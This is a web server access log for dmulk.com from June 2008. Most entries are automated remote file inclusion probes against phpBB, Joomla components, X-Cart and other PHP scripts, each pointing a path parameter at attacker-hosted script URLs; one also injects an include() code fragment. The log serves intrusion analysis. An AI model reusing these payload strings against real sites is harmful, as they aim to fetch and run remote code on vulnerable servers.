66.98.224.22 - - [17/Jun/2008:09:50:41 -0700] "GET /logs//Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:09:50:42 -0700] "GET //Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:50:43 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:50:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:50:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:50:44 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:51 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:52 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:56 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:50:56 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:50:59 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:50:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:50:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:50:59 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:51:13 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:51:27 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:51:44 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:51:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:52:42 -0700] "GET /logs//smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:52:42 -0700] "GET /logs//smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:52:42 -0700] "GET //smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:52:42 -0700] "GET //smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:09:52:52 -0700] "GET /errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:53:02 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:53:02 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:11 -0700] "GET /logs/access_080105.log//smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:12 -0700] "GET //smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:12 -0700] "GET /logs/access_080105.log//smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:12 -0700] "GET /logs//smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:13 -0700] "GET //smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:13 -0700] "GET /logs//smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:09:53:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:09:53:38 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:43 -0700] "GET /logs/access_071222.log//smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:53:48 -0700] "GET /logs/access_071222.log//smarty.php?xcart_dir=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.251.172 - - [17/Jun/2008:09:54:04 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:54:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:54:06 -0700] "GET //skin/zero_vote/error.php?dir=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:54:15 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:54:21 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:54:29 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:54:29 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.102.101.139 - - [17/Jun/2008:09:54:30 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:54:30 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:09:55:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:09:55:42 -0700] "GET //skin/zero_vote/error.php?dir=http://super4host.com/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.107 - - [17/Jun/2008:09:55:44 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:56:50 -0700] "GET //smarty.php?xcart_dir=http://oliverwebster.com//guestbook/public.htm/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:09:57:20 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:09:57:20 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:58:50 -0700] "GET /logs/access_080329.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:09:59:53 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:09:59:55 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:09:59:59 -0700] "GET /logs/access_080328.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:10:00:01 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:10:00:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:10:00:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:01:06 -0700] "GET /logs/access_080112.log/modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:01:06 -0700] "GET /modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:01:07 -0700] "GET /logs/modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:01:18 -0700] "GET /logs/access_080204.log/modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:01:42 -0700] "GET /logs//smarty.php?xcart_dir=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:01:42 -0700] "GET //smarty.php?xcart_dir=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:10:02:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [17/Jun/2008:10:02:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:10:02:31 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "dmulk.com"
67.205.96.205 - - [17/Jun/2008:10:02:31 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:03:45 -0700] "GET /logs/modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:10:03:45 -0700] "GET /modify.php?dir_module=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:03:57 -0700] "GET /logs/access_080105.log//smarty.php?xcart_dir=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:03:58 -0700] "GET /logs/access_071222.log//smarty.php?xcart_dir=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:10:04:26 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:10:04:30 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 18515 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:10:04:31 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:10:06:16 -0700] "GET /logs/access_080307.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:10:06:49 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:10:06:49 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [17/Jun/2008:10:07:19 -0700] "GET /logs/index.php?option=com_virtuemart&task=&Itemid=&mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
59.126.46.141 - - [17/Jun/2008:10:07:20 -0700] "GET /index.php?option=com_virtuemart&task=&Itemid=&mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 200 18507 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.98.137.8 - - [17/Jun/2008:10:07:51 -0700] "GET /logs///myspeach/jscript.php?my_ms[root]=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.137.8 - - [17/Jun/2008:10:07:51 -0700] "GET ///myspeach/jscript.php?my_ms[root]=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:10:08:16 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:10:08:18 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.137.8 - - [17/Jun/2008:10:08:46 -0700] "GET /logs///myspeach/jscript.php?my_ms[root]=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.137.8 - - [17/Jun/2008:10:08:46 -0700] "GET ///myspeach/jscript.php?my_ms[root]=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.43.96.205 - - [17/Jun/2008:10:09:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.30 - - [17/Jun/2008:10:10:14 -0700] "GET /bikes/dteel/2008_02_23/?D=D HTTP/1.1" 200 1556 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [17/Jun/2008:10:10:15 -0700] "GET /bikes/dteel/2008-05-30/ HTTP/1.1" 200 6027 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:10:10:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:10:10:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [17/Jun/2008:10:10:45 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [17/Jun/2008:10:10:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [17/Jun/2008:10:10:45 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:10:53 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:10:53 -0700] "GET //components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:10:56 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:10:11:04 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:10:11:05 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.20.138.101 - - [17/Jun/2008:10:11:10 -0700] "GET /logs/access_071212.log/modules/My_eGallery/index.php?basepath=http://www.com.ulaval.ca/st-hilaire/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:11:36 -0700] "GET //components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:11:36 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:12:40 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:10:13:54 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.27 - - [17/Jun/2008:10:14:18 -0700] "GET /bikes/WeSTOC07/?M=D HTTP/1.1" 200 971 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
